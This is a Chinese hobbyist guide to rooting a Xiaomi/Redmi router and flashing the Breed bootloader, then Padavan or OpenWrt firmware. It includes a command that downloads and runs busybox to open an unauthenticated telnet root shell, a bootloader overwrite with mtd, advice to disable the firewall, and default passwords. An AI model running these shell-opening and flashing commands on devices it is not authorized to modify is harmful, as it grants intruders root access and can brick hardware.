准备工作
1、打开 telnet 设置——程序和功能——启用或关闭windows功能—— telnet开启
2、关闭防火墙
3、网线连接
4、关闭无关网络
5、设置静态IP 192.168.31.177 子掩码:255.255.255.0 网关:192.168.31.1
6、开启telnet脚本
7、复制好代码
cd /tmp&&wget http://192.168.31.177:8081/busybox&&chmod a+x ./busybox&&./busybox telnetd -l /bin/sh
8、输入192.168.31.1 打开红米后台
pppoe拨号模式 账号和密码都是123
9、刷机脚本回车,能看见反弹shell后输入刚才复制的命令
刷入breed
win+r
cmd
telnet 192.168.31.1
wget http://192.168.31.177:8081/breed-mt7621-xiaomi-r3g.bin&&nvram set uart_en=1&&nvram set bootdelay=5&&nvram set flag_try_sys1_failed=1&&nvram commit
mtd -r write breed-mt7621-xiaomi-r3g.bin Bootloader
刷padavan
padavan固件(chongshengB)
https://github.com/chongshengB/rt-n56u/releases
等待路由器重启,将电脑改为自动获取ip,当电脑获取到ip或者路由只有一个蓝灯亮时,breed引导官方固件成功。
之后可按照breed的正常使用方法:断电,牙签按住reset键通电,等蓝灯闪烁即路由正常进入breed,电脑网线接lan,访问192.168.1.1。
想刷入老毛子就点击“固件更新”-在“固件”位置上传文件中的.trx文件正常刷入。
登陆地址 http://192.168.1.1/用户名:admin 密码:admin
刷openwrt
https://www.right.com.cn/forum/thread-4027477-1-1.html(固件地址)
断电,牙签按住reset键通电,等蓝灯闪烁即路由正常进入breed,电脑网线接lan,访问192.168.1.1。
进breed的环境变量编缉菜单,新增字段xiaomi.r3g.bootfw值为2
刷入过度版openwrt
过度openwrt的地址是 http://192.168.1.1/ ,用户名是root,没有密码。
然后我们进入 http://192.168.1.1/cgi-bin/luci/admin/system/flash (对应的菜单是System -> Backup / Flash Firmware),点击 Flash image... 上传我们想刷的固件
不要勾选 Keep settings and retain the current configuration,最后点Continue,等几分钟让路由器自己重启。
进入新固件:
192.168.2.1 用户名:root 密码:password
无法访问google.com,但是可以访问google.com.hk
刷新一下dns缓存
ipconfig/flushdns